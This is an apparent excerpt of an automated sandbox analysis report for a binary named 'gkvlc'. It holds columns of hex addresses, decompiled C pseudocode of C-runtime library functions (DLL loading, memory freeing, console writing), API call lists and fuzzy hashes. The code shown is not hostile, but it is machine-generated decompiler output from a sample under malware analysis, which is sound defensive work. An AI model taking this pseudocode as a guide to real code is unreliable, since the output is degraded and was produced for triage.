                                                                                            0x00408600
                                                                                            0x00408600
                                                                                            0x0040858b
                                                                                            0x0040859c
                                                                                            0x004085a0
                                                                                            0x004085ac
                                                                                            0x004085ae
                                                                                            0x004085b0
                                                                                            0x004085b5
                                                                                            0x004085b5
                                                                                            0x004085b8
                                                                                            0x004085b8
                                                                                            0x00000000
                                                                                            0x004085ae
                                                                                            0x00408589
                                                                                            0x00408576
                                                                                            0x00408554
                                                                                            0x004084ae
                                                                                            0x004084aa
                                                                                            0x00408409
                                                                                            0x00408409
                                                                                            0x0040840c
                                                                                            0x0040842a
                                                                                            0x0040842a
                                                                                            0x0040842d
                                                                                            0x00408440
                                                                                            0x00408445
                                                                                            0x0040844a
                                                                                            0x0040844d
                                                                                            0x00408453
                                                                                            0x004085d2
                                                                                            0x004085d2
                                                                                            0x004085d2
                                                                                            0x00000000
                                                                                            0x00408459
                                                                                            0x00408459
                                                                                            0x0040845f
                                                                                            0x00000000
                                                                                            0x00408461
                                                                                            0x0040846b
                                                                                            0x00408470
                                                                                            0x00408475
                                                                                            0x00408478
                                                                                            0x0040847e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040847e
                                                                                            0x0040845f
                                                                                            0x0040842f
                                                                                            0x0040842f
                                                                                            0x004085d5
                                                                                            0x004085d6
                                                                                            0x004085dd
                                                                                            0x00000000
                                                                                            0x004085df
                                                                                            0x0040840e
                                                                                            0x0040840e
                                                                                            0x00408414
                                                                                            0x00000000
                                                                                            0x00408416
                                                                                            0x0040841b
                                                                                            0x0040841d
                                                                                            0x00000000
                                                                                            0x00408423
                                                                                            0x00408423
                                                                                            0x00000000
                                                                                            0x00408423
                                                                                            0x0040841d
                                                                                            0x00408414
                                                                                            0x0040840c
                                                                                            0x00408407
                                                                                            0x004083ee
                                                                                            0x004083c0
                                                                                            0x004083c0
                                                                                            0x004083c5
                                                                                            0x004083cb
                                                                                            0x004085e0
                                                                                            0x004085e2
                                                                                            0x004085e2
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                            • String ID:
                                                                                            • API String ID: 3409252457-0
                                                                                            • Opcode ID: 301e941c2a3f5961d81e0ec3511a9b2285bb5f025c7e56381fae026d24f1c3f4
                                                                                            • Instruction ID: 52fb1093dafbe7b0b8fb260d10981e5d748a27f846bbf11f36e6eae63bc94dd1
                                                                                            • Opcode Fuzzy Hash: 301e941c2a3f5961d81e0ec3511a9b2285bb5f025c7e56381fae026d24f1c3f4
                                                                                            • Instruction Fuzzy Hash: 3F51D871904306AFDB20AF699D81A6E7BA4AF01314F14817FF991B73C2EE799900CB5D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00409413 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00409413(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x418248 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x411ba0 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00404E88(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00404E88(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                                                                            0x0040941c
                                                                                            0x004094c6
                                                                                            0x00409424
                                                                                            0x00409426
                                                                                            0x0040942d
                                                                                            0x0040942f
                                                                                            0x00409435
                                                                                            0x00409442
                                                                                            0x00409457
                                                                                            0x0040945b
                                                                                            0x004094ad
                                                                                            0x004094ad
                                                                                            0x004094b2
                                                                                            0x004094b6
                                                                                            0x004094b9
                                                                                            0x004094b9
                                                                                            0x004094bf
                                                                                            0x004094c1
                                                                                            0x004094d6
                                                                                            0x004094d1
                                                                                            0x004094d5
                                                                                            0x004094d5
                                                                                            0x004094c3
                                                                                            0x004094c3
                                                                                            0x00000000
                                                                                            0x004094c3
                                                                                            0x0040945d
                                                                                            0x00409466
                                                                                            0x0040949d
                                                                                            0x0040949d
                                                                                            0x0040949f
                                                                                            0x004094a1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004094a9
                                                                                            0x00000000
                                                                                            0x004094a9
                                                                                            0x00409470
                                                                                            0x00409475
                                                                                            0x0040947a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00409484
                                                                                            0x00409489
                                                                                            0x0040948e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00409493
                                                                                            0x00409499
                                                                                            0x00000000
                                                                                            0x00409499
                                                                                            0x0040943a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00409440
                                                                                            0x004094cf
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: api-ms-$ext-ms-
                                                                                            • API String ID: 0-537541572
                                                                                            • Opcode ID: 4e0e93e734b47749400350771524af6e5f75db7581d46ee249386d1017f5317b
                                                                                            • Instruction ID: 401a3a4f57191eb1eef9407bfae185c956b9864607cd941956cdc279d55b3715
                                                                                            • Opcode Fuzzy Hash: 4e0e93e734b47749400350771524af6e5f75db7581d46ee249386d1017f5317b
                                                                                            • Instruction Fuzzy Hash: D721D572E0A220ABCB219B25EC40B5B3768AB05760F254176FD09B73D2D678ED02C5E9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00408DBC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00408DBC(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00408D84(_t45, 7);
					E00408D84(_t45 + 0x1c, 7);
					E00408D84(_t45 + 0x38, 0xc);
					E00408D84(_t45 + 0x68, 0xc);
					E00408D84(_t45 + 0x98, 2);
					E00406FE2( *((intOrPtr*)(_t45 + 0xa0)));
					E00406FE2( *((intOrPtr*)(_t45 + 0xa4)));
					E00406FE2( *((intOrPtr*)(_t45 + 0xa8)));
					E00408D84(_t45 + 0xb4, 7);
					E00408D84(_t45 + 0xd0, 7);
					E00408D84(_t45 + 0xec, 0xc);
					E00408D84(_t45 + 0x11c, 0xc);
					E00408D84(_t45 + 0x14c, 2);
					E00406FE2( *((intOrPtr*)(_t45 + 0x154)));
					E00406FE2( *((intOrPtr*)(_t45 + 0x158)));
					E00406FE2( *((intOrPtr*)(_t45 + 0x15c)));
					return E00406FE2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                                                            0x00408dc2
                                                                                            0x00408dc7
                                                                                            0x00408dd0
                                                                                            0x00408ddb
                                                                                            0x00408de6
                                                                                            0x00408df1
                                                                                            0x00408dff
                                                                                            0x00408e0a
                                                                                            0x00408e15
                                                                                            0x00408e20
                                                                                            0x00408e2e
                                                                                            0x00408e3c
                                                                                            0x00408e4d
                                                                                            0x00408e5b
                                                                                            0x00408e69
                                                                                            0x00408e74
                                                                                            0x00408e7f
                                                                                            0x00408e8a
                                                                                            0x00000000
                                                                                            0x00408e9a
                                                                                            0x00408e9f

                                                                                            APIs
                                                                                              • Part of subcall function 00408D84: _free.LIBCMT ref: 00408DA9
                                                                                            • _free.LIBCMT ref: 00408E0A
                                                                                              • Part of subcall function 00406FE2: HeapFree.KERNEL32(00000000,00000000,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?), ref: 00406FF8
                                                                                              • Part of subcall function 00406FE2: GetLastError.KERNEL32(?,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?,?), ref: 0040700A
                                                                                            • _free.LIBCMT ref: 00408E15
                                                                                            • _free.LIBCMT ref: 00408E20
                                                                                            • _free.LIBCMT ref: 00408E74
                                                                                            • _free.LIBCMT ref: 00408E7F
                                                                                            • _free.LIBCMT ref: 00408E8A
                                                                                            • _free.LIBCMT ref: 00408E95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: d82d14a687caea39c442ee6a105ee1c2b8fef3a02f20e7cd5b4ceaa160efe245
                                                                                            • Instruction ID: b505e67f4e5941e7613950f1e9c3da0c4179b73a37775acd0e03c5555dcdd3c6
                                                                                            • Opcode Fuzzy Hash: d82d14a687caea39c442ee6a105ee1c2b8fef3a02f20e7cd5b4ceaa160efe245
                                                                                            • Instruction Fuzzy Hash: B2116D31540B09EAD560BBB2CD47FCB7BAD5F00708F44493EB6EAB60D2DA78E6184658
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040B087 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E0040B087(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				intOrPtr _t176;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x417094; // 0xa69f0419
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_t176 =  *((intOrPtr*)(0x417ed8 + _t244 * 4));
				_v80 = _t272;
				_t10 = _t176 + 0x18; // 0x8458b01
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 + _t10));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E00402CE0( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x417ed8 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x417250)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x417ed8 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x417250)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x417ed8 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E00402760( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x417ed8 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E0040C7BE(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E00408248(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E004050B2(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x417ed8 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x417ed8 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x417ed8 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E0040A2AA( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E0040A2AA();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00401C75(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}























































































                                                                                            0x0040b092
                                                                                            0x0040b099
                                                                                            0x0040b09c
                                                                                            0x0040b0a1
                                                                                            0x0040b0a9
                                                                                            0x0040b0ac
                                                                                            0x0040b0b0
                                                                                            0x0040b0b3
                                                                                            0x0040b0b6
                                                                                            0x0040b0bd
                                                                                            0x0040b0c0
                                                                                            0x0040b0c7
                                                                                            0x0040b0c9
                                                                                            0x0040b0cc
                                                                                            0x0040b0cf
                                                                                            0x0040b0d5
                                                                                            0x0040b0d7
                                                                                            0x0040b0de
                                                                                            0x0040b0eb
                                                                                            0x0040b0ec
                                                                                            0x0040b0ef
                                                                                            0x0040b0f2
                                                                                            0x0040b0f3
                                                                                            0x0040b0f4
                                                                                            0x0040b0f7
                                                                                            0x0040b0fc
                                                                                            0x0040b408
                                                                                            0x0040b408
                                                                                            0x0040b102
                                                                                            0x0040b102
                                                                                            0x0040b105
                                                                                            0x0040b107
                                                                                            0x0040b10d
                                                                                            0x0040b110
                                                                                            0x0040b117
                                                                                            0x0040b11e
                                                                                            0x0040b127
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040b12d
                                                                                            0x0040b133
                                                                                            0x0040b135
                                                                                            0x0040b137
                                                                                            0x0040b13a
                                                                                            0x0040b13f
                                                                                            0x0040b143
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040b143
                                                                                            0x0040b148
                                                                                            0x0040b14b
                                                                                            0x0040b14d
                                                                                            0x0040b152
                                                                                            0x0040b204
                                                                                            0x0040b205
                                                                                            0x0040b208
                                                                                            0x0040b20a
                                                                                            0x0040b3b8
                                                                                            0x0040b3ba
                                                                                            0x00000000
                                                                                            0x0040b3bc
                                                                                            0x0040b3bc
                                                                                            0x0040b3bf
                                                                                            0x0040b3c2
                                                                                            0x0040b3cb
                                                                                            0x0040b3ce
                                                                                            0x0040b3cf
                                                                                            0x0040b3d3
                                                                                            0x0040b3d6
                                                                                            0x0040b3d6
                                                                                            0x00000000
                                                                                            0x0040b3da
                                                                                            0x0040b210
                                                                                            0x0040b210
                                                                                            0x0040b215
                                                                                            0x0040b218
                                                                                            0x0040b21e
                                                                                            0x0040b224
                                                                                            0x0040b22d
                                                                                            0x0040b230
                                                                                            0x0040b230
                                                                                            0x0040b231
                                                                                            0x0040b232
                                                                                            0x0040b235
                                                                                            0x0040b236
                                                                                            0x00000000
                                                                                            0x0040b236
                                                                                            0x0040b158
                                                                                            0x0040b167
                                                                                            0x0040b168
                                                                                            0x0040b16b
                                                                                            0x0040b16d
                                                                                            0x0040b172
                                                                                            0x0040b383
                                                                                            0x0040b385
                                                                                            0x0040b387
                                                                                            0x0040b38a
                                                                                            0x0040b38f
                                                                                            0x0040b398
                                                                                            0x0040b39b
                                                                                            0x0040b39c
                                                                                            0x0040b3a0
                                                                                            0x0040b3a3
                                                                                            0x0040b3a6
                                                                                            0x0040b3a6
                                                                                            0x0040b3aa
                                                                                            0x0040b3aa
                                                                                            0x0040b3aa
                                                                                            0x0040b3ad
                                                                                            0x0040b3ad
                                                                                            0x0040b3ad
                                                                                            0x0040b3af
                                                                                            0x0040b3af
                                                                                            0x0040b3b3
                                                                                            0x0040b178
                                                                                            0x0040b178
                                                                                            0x0040b17c
                                                                                            0x0040b17e
                                                                                            0x0040b181
                                                                                            0x0040b184
                                                                                            0x0040b188
                                                                                            0x0040b189
                                                                                            0x0040b18d
                                                                                            0x0040b18d
                                                                                            0x0040b190
                                                                                            0x0040b195
                                                                                            0x0040b1a1
                                                                                            0x0040b1a6
                                                                                            0x0040b1a9
                                                                                            0x0040b1a9
                                                                                            0x0040b1ae
                                                                                            0x0040b1b0
                                                                                            0x0040b1b3
                                                                                            0x0040b1b5
                                                                                            0x0040b1b8
                                                                                            0x0040b1bb
                                                                                            0x0040b1be
                                                                                            0x0040b1c6
                                                                                            0x0040b1ca
                                                                                            0x0040b1ce
                                                                                            0x0040b1ce
                                                                                            0x0040b1d4
                                                                                            0x0040b1da
                                                                                            0x0040b1dd
                                                                                            0x0040b1e5
                                                                                            0x0040b1ec
                                                                                            0x0040b1f0
                                                                                            0x0040b1f1
                                                                                            0x0040b1f4
                                                                                            0x0040b1f5
                                                                                            0x0040b239
                                                                                            0x0040b239
                                                                                            0x0040b23d
                                                                                            0x0040b23e
                                                                                            0x0040b243
                                                                                            0x0040b249
                                                                                            0x00000000
                                                                                            0x0040b24f
                                                                                            0x0040b253
                                                                                            0x0040b2dc
                                                                                            0x0040b2e3
                                                                                            0x0040b2eb
                                                                                            0x0040b2f3
                                                                                            0x0040b2f8
                                                                                            0x0040b2fb
                                                                                            0x0040b300
                                                                                            0x00000000
                                                                                            0x0040b306
                                                                                            0x0040b31b
                                                                                            0x0040b3ff
                                                                                            0x0040b405
                                                                                            0x00000000
                                                                                            0x0040b321
                                                                                            0x0040b32a
                                                                                            0x0040b32c
                                                                                            0x0040b332
                                                                                            0x00000000
                                                                                            0x0040b338
                                                                                            0x0040b33c
                                                                                            0x0040b372
                                                                                            0x0040b375
                                                                                            0x00000000
                                                                                            0x0040b37b
                                                                                            0x0040b37b
                                                                                            0x00000000
                                                                                            0x0040b37b
                                                                                            0x0040b33e
                                                                                            0x0040b340
                                                                                            0x0040b342
                                                                                            0x0040b35b
                                                                                            0x00000000
                                                                                            0x0040b361
                                                                                            0x0040b365
                                                                                            0x00000000
                                                                                            0x0040b36b
                                                                                            0x0040b36b
                                                                                            0x0040b36e
                                                                                            0x0040b36f
                                                                                            0x00000000
                                                                                            0x0040b36f
                                                                                            0x0040b365
                                                                                            0x0040b35b
                                                                                            0x0040b33c
                                                                                            0x0040b332
                                                                                            0x0040b31b
                                                                                            0x0040b300
                                                                                            0x0040b249
                                                                                            0x0040b172
                                                                                            0x00000000
                                                                                            0x0040b25a
                                                                                            0x0040b25a
                                                                                            0x0040b25d
                                                                                            0x0040b261
                                                                                            0x0040b264
                                                                                            0x0040b286
                                                                                            0x0040b289
                                                                                            0x0040b28e
                                                                                            0x0040b292
                                                                                            0x0040b296
                                                                                            0x0040b2c4
                                                                                            0x0040b2c6
                                                                                            0x00000000
                                                                                            0x0040b298
                                                                                            0x0040b298
                                                                                            0x0040b29b
                                                                                            0x0040b29e
                                                                                            0x0040b2a1
                                                                                            0x0040b3dc
                                                                                            0x0040b3df
                                                                                            0x0040b3e2
                                                                                            0x0040b3ec
                                                                                            0x0040b3f7
                                                                                            0x0040b3fc
                                                                                            0x00000000
                                                                                            0x0040b2a7
                                                                                            0x0040b2ae
                                                                                            0x0040b2b3
                                                                                            0x0040b2b6
                                                                                            0x0040b2b9
                                                                                            0x00000000
                                                                                            0x0040b2bf
                                                                                            0x0040b2bf
                                                                                            0x00000000
                                                                                            0x0040b2bf
                                                                                            0x0040b2b9
                                                                                            0x0040b2a1
                                                                                            0x0040b266
                                                                                            0x0040b26a
                                                                                            0x0040b26d
                                                                                            0x0040b272
                                                                                            0x0040b278
                                                                                            0x0040b27a
                                                                                            0x0040b281
                                                                                            0x0040b2c7
                                                                                            0x0040b2ca
                                                                                            0x0040b2cb
                                                                                            0x0040b2d0
                                                                                            0x0040b2d3
                                                                                            0x0040b2d6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040b2d6
                                                                                            0x00000000
                                                                                            0x0040b264
                                                                                            0x0040b105
                                                                                            0x0040b40b
                                                                                            0x0040b40b
                                                                                            0x0040b40d
                                                                                            0x0040b410
                                                                                            0x0040b410
                                                                                            0x0040b410
                                                                                            0x0040b410
                                                                                            0x0040b422
                                                                                            0x0040b424
                                                                                            0x0040b425
                                                                                            0x0040b426
                                                                                            0x0040b430

                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(8304488B,004033BF,00000000), ref: 0040B0CF
                                                                                            • __fassign.LIBCMT ref: 0040B2AE
                                                                                            • __fassign.LIBCMT ref: 0040B2CB
                                                                                            • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B313
                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040B353
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B3FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
